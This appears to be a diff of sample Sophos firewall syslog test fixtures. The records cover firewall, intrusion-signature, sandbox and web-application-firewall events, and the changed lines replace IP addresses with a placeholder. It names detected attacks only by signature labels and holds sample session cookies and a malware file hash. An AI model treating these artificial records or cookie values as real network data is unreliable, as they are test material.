sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" 
vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" date=2020-05-18 time=14:38:44 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=012802605201 log_type="Firewall" log_component="SSL VPN" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="tun0" out_interface="" src_mac="" src_ip=10.82.234.9 src_country_code="" dst_ip=10.82.234.11 dst_country_code="" protocol="TCP" src_port=58331 dst_port=56267 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=61 policy_type=2 user_name="elastic@user.local" user_gp="elastic.group.local" iap=0 ips_policy_id=11 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=10.84.234.7 src_country_code=R1 dst_ip=172.16.34.50 dst_country_code=R1 protocol="TCP" src_port=58543 dst_port=443 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="VPN" srczone="VPN" dstzonetype="VPN" dstzone="VPN" dir_disp="" connevent="Start" connid="1615935064" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" 
device_name="XG230" device_id=1234567890123457 log_id=018201500005 log_type="Firewall" log_component="ICMP ERROR MESSAGE" log_subtype="Allowed" status="Allow" priority=Notice duration=0 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=192.168.1.254 src_country_code="" dst_ip=172.17.32.19 dst_country_code="" protocol="ICMP" icmp_type=3 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connevent="Interim" connid="2685668438" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-06-05 time=12:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=10 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port1" src_mac=00:00:00:00:00:00 src_ip=172.17.35.119 src_country_code=R1 dst_ip=172.16.34.10 dst_country_code=R1 protocol="TCP" src_port=61925 dst_port=88 sent_pkts=6 recv_pkts=6 sent_bytes=1802 recv_bytes=1732 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0srczonetype="VPN" srczone="VPN" dstzonetype="LAN" dstzone="LAN" dir_disp="" connevent="Stop" connid="1617126256" vconnid="" hb_health="NoHeartbeat" message="" appresolvedby="Signature" app_is_cloud=0" -<30>device="SFW" date=2018-05-30 time=13:26:37 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010202601001 log_type="Firewall" log_component="Invalid Traffic" log_subtype="Denied" 
status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol="UDP" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="Invalid UDP destination." appresolvedby=" Signature" +<30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=61 policy_type=2 user_name="elastic@user.local" user_gp="elastic.group.local" iap=0 ips_policy_id=11 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=10.84.234.7 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=R1 protocol="TCP" src_port=58543 dst_port=443 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="VPN" srczone="VPN" dstzonetype="VPN" dstzone="VPN" dir_disp="" connevent="Start" connid="1615935064" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=018201500005 log_type="Firewall" log_component="ICMP ERROR MESSAGE" log_subtype="Allowed" status="Allow" priority=Notice duration=0 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" 
application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=192.168.1.254 src_country_code="" dst_ip=175.16.199.1 dst_country_code="" protocol="ICMP" icmp_type=3 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connevent="Interim" connid="2685668438" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-06-05 time=12:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=10 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port1" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=R1 protocol="TCP" src_port=61925 dst_port=88 sent_pkts=6 recv_pkts=6 sent_bytes=1802 recv_bytes=1732 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0srczonetype="VPN" srczone="VPN" dstzonetype="LAN" dstzone="LAN" dir_disp="" connevent="Stop" connid="1617126256" vconnid="" hb_health="NoHeartbeat" message="" appresolvedby="Signature" app_is_cloud=0" +<30>device="SFW" date=2018-05-30 time=13:26:37 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010202601001 log_type="Firewall" log_component="Invalid Traffic" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.32.19 
src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol="UDP" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="Invalid UDP destination." appresolvedby=" Signature" <30>device="SFW" date=2018-06-04 time=17:20:24 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=011402601301 log_type="Firewall" log_component="Fragmented Traffic" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=0.0.0.0 src_country_code= dst_ip=0.0.0.0 dst_country_code= protocol="0" src_port=0 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-05-30 time=14:01:32 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=2 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2.611" out_interface="" src_mac=c8:5b:76:ab:72:d3 src_ip=10.198.38.184 src_country_code= dst_ip=10.198.39.255 dst_country_code= protocol="UDP" src_port=137 dst_port=137 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" 
vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-05-30 time=14:17:17 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010402403001 log_type="Firewall" log_component="DoS Attack" log_subtype="Denied" status="Deny" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=b8:97:5a:5b:0f:fd src_ip=10.198.32.19 src_country_code= dst_ip=10.198.32.48 dst_country_code= protocol="TCP" src_port=41960 dst_port=22 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby=" Signature" <30>device="SFW" date=2018-06-05 time=14:30:31 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010502604001 log_type="Firewall" log_component="ICMP Redirection" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.37.23 src_country_code= dst_ip=10.198.36.48 dst_country_code= protocol="ICMP" icmp_type=5 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby=" Signature" -<30>device="SFW" date=2018-05-31 time=17:05:14 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010602605001 log_type="Firewall" log_component="Source Routed" log_subtype="Denied" status="Deny" 
priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol="TCP" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" +<30>device="SFW" date=2018-05-31 time=17:05:14 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010602605001 log_type="Firewall" log_component="Source Routed" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol="TCP" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-05-30 time=15:09:51 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=011702605051 log_type="Firewall" log_component="MAC Filter" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2.531" out_interface="" src_mac=1e:3a:5a:5b:23:ab src_ip=fe80::59f5:3ce8:c98e:5062 src_country_code= 
dst_ip=ff02::1:2 dst_country_code= protocol="UDP" src_port=546 dst_port=547 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-06-01 time=10:57:55 timezone="BST" device_name="XG310" device_id=SFDemo-9a04c43 log_id=016602600006 log_type="Firewall" log_component="Heartbeat" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port3.611" out_interface="" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=10.198.32.19 dst_country_code= protocol="ICMP" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="Red" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2018-06-01 time=10:55:41 timezone="BST" device_name="XG310" device_id=SFDemo-9a04c43 log_id=016602600003 log_type="Firewall" log_component="Heartbeat" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port3.611" out_interface="" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=72.163.4.185 dst_country_code= protocol="ICMP" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" 
hb_health="Red" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:54 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=1881 signature_msg="SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack" classification="access to a potentially vulnerable web application" rule_priority=2 src_ip=89.40.182.58 src_country_code=ROU dst_ip=172.16.68.20 dst_country_code=R1 protocol="TCP" src_port=41528 dst_port=80 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="server-webapp" target="Server" -<30>device="SFW" date=2020-05-18 time=14:38:55 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name="" signature_id=1616 signature_msg="PROTOCOL-DNS named version attempt" classification="Attempted Information Leak" rule_priority=1 src_ip=117.50.11.192 src_country_code=CHN dst_ip=172.16.66.155 dst_country_code=R1 protocol="UDP" src_port=58914 dst_port=53 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="protocol-dns" target="Server" -<30>device="SFW" date=2020-05-18 time=14:38:56 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=53589 signature_msg="SERVER-WEBAPP DrayTek multiple products command injection attempt" classification="Web Application Attack" rule_priority=2 src_ip=77.61.185.101 src_country_code=NLD dst_ip=172.16.68.20 dst_country_code=R1 protocol="TCP" src_port=59476 dst_port=80 platform="Linux,Mac,Other,Unix,Windows" category="server-webapp" target="Server" +<30>device="SFW" date=2018-06-01 time=10:55:41 timezone="BST" 
device_name="XG310" device_id=SFDemo-9a04c43 log_id=016602600003 log_type="Firewall" log_component="Heartbeat" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port3.611" out_interface="" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol="ICMP" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="Red" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:54 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=1881 signature_msg="SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack" classification="access to a potentially vulnerable web application" rule_priority=2 src_ip=175.16.199.1 src_country_code=ROU dst_ip=175.16.199.1 dst_country_code=R1 protocol="TCP" src_port=41528 dst_port=80 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="server-webapp" target="Server" +<30>device="SFW" date=2020-05-18 time=14:38:55 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name="" signature_id=1616 signature_msg="PROTOCOL-DNS named version attempt" classification="Attempted Information Leak" rule_priority=1 src_ip=175.16.199.1 src_country_code=CHN dst_ip=175.16.199.1 dst_country_code=R1 protocol="UDP" src_port=58914 dst_port=53 
platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="protocol-dns" target="Server" +<30>device="SFW" date=2020-05-18 time=14:38:56 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=53589 signature_msg="SERVER-WEBAPP DrayTek multiple products command injection attempt" classification="Web Application Attack" rule_priority=2 src_ip=175.16.199.1 src_country_code=NLD dst_ip=175.16.199.1 dst_country_code=R1 protocol="TCP" src_port=59476 dst_port=80 platform="Linux,Mac,Other,Unix,Windows" category="server-webapp" target="Server" <30>device="SFW" date=2018-05-23 time=16:20:34 timezone="BST" device_name="XG750" device_id=SFDemo-f64dd6be log_id=020703406001 log_type="IDP" log_component="Anomaly" log_subtype="Detect" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name="" signature_id=26022 signature_msg="FILE-PDF EmbeddedFile contained within a PDF" classification="A Network Trojan was detected" rule_priority=1 src_ip=10.0.0.168 src_country_code=R1 dst_ip=10.1.1.234 dst_country_code=R1 protocol="TCP" src_port=28938 dst_port=25 platform="Windows" category="Malware Communication" target="Server" <30>device="SFW" date=2018-05-23 time=16:16:43 timezone="BST" device_name="XG750" device_id=SFDemo-f64dd6be log_id=020704406002 log_type="IDP" log_component="Anomaly" log_subtype="Drop" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name="" signature_id=26022 signature_msg="FILE-PDF EmbeddedFile contained within a PDF" classification="A Network Trojan was detected" rule_priority=1 src_ip=10.0.1.31 src_country_code=R1 dst_ip=10.1.0.115 dst_country_code=R1 protocol="TCP" src_port=40140 dst_port=25 platform="Windows" category="Malware Communication" target="Server" <30>device="SFW" date=2017-01-31 time=14:52:11 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=138301618041 
log_type="Sandbox" log_component="Mail" log_subtype="Allowed" priority=Information user_name="" src_ip= filename="" filetype="" filesize=0 sha1sum="" source="" reason="eligible" destination="" subject="" 
@@ -79,11 +79,11 @@
 <30>device="SFW" date=2017-01-31 time=15:28:25 timezone="IST" device_name="CR750iNG-XP" device_id=C44313350024-P29PUA log_id=136501618041 log_type="Sandbox" log_component="Web" log_subtype="Allowed" priority=Information user_name="" src_ip= filename="" filetype="" filesize=0 sha1sum="" source="" reason="eligible" destination="" subject=""
 <30>device="SFW" date=2017-01-31 time=15:28:25 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=136528618043 log_type="Sandbox" log_component="Web" log_subtype="Pending" priority=Information user_name="jsmith" src_ip=10.198.47.112 filename="19.exe" filetype="application/octet-stream" filesize=153010 sha1sum="3ce799580908df9ca0dc649aa8c2d06ab267e8c8" source="10.198.241.50" reason="pending" destination="" subject=""
 <30>device="SFW" date=2017-01-31 time=15:28:25 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=136502218042 log_type="Sandbox" log_component="Web" log_subtype="Denied" priority=Critical user_name="jsmith" src_ip=10.198.47.112 filename="19.exe" filetype="application/octet-stream" filesize=153010 sha1sum="3ce799580908df9ca0dc649aa8c2d06ab267e8c8" source="10.198.241.50" reason="cloud malicious" destination="" subject="
-<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=136502218042 log_type="Sandbox" log_component="Web" log_subtype="Denied" priority=Critical user_name="" src_ip=172.16.34.24 filename="SBTestFile1.pdf" filetype="application/pdf" filesize=1124 sha1sum="d910c4a81122c360fe57f67a04999425a65249db" source="sophostest.com" reason="cached malicious" destination="" subject=""
-<30>device="SFW" date=2020-05-18 time=14:38:46 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL" referer=- method=POST httpstatus=401 reason="-" extra="-" contenttype="-" useragent="Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)" host=89.68.140.204 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79
-<30>device="SFW" date=2020-05-18 time=14:38:47 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M" referer=- method=POST httpstatus=200 reason="-" extra="-" contenttype="application/mapi-http" useragent="Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)" host=89.68.140.204 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79
+<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=136502218042 log_type="Sandbox" log_component="Web" log_subtype="Denied" priority=Critical user_name="" src_ip=175.16.199.1 filename="SBTestFile1.pdf" filetype="application/pdf" filesize=1124 sha1sum="d910c4a81122c360fe57f67a04999425a65249db" source="sophostest.com" reason="cached malicious" destination="" subject=""
+<30>device="SFW" date=2020-05-18 time=14:38:46 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL" referer=- method=POST httpstatus=401 reason="-" extra="-" contenttype="-" useragent="Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)" host=175.16.199.1 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79
+<30>device="SFW" date=2020-05-18 time=14:38:47 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M" referer=- method=POST httpstatus=200 reason="-" extra="-" contenttype="application/mapi-http" useragent="Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)" host=175.16.199.1 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79
 <30>device="SFW" date=2020-05-19 time=17:20:29 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="jsmith" server=www.iviewtest.com:8989 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol="HTTP/1.1" url=/ querystring= cookie="-" referer=- method=GET httpstatus=403 reason="Static URL Hardening" extra="No signature found" contenttype="text/html" useragent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" host=10.198.235.254 responsetime=19310 bytessent=726 bytesrcv=510 fw_rule_id=3
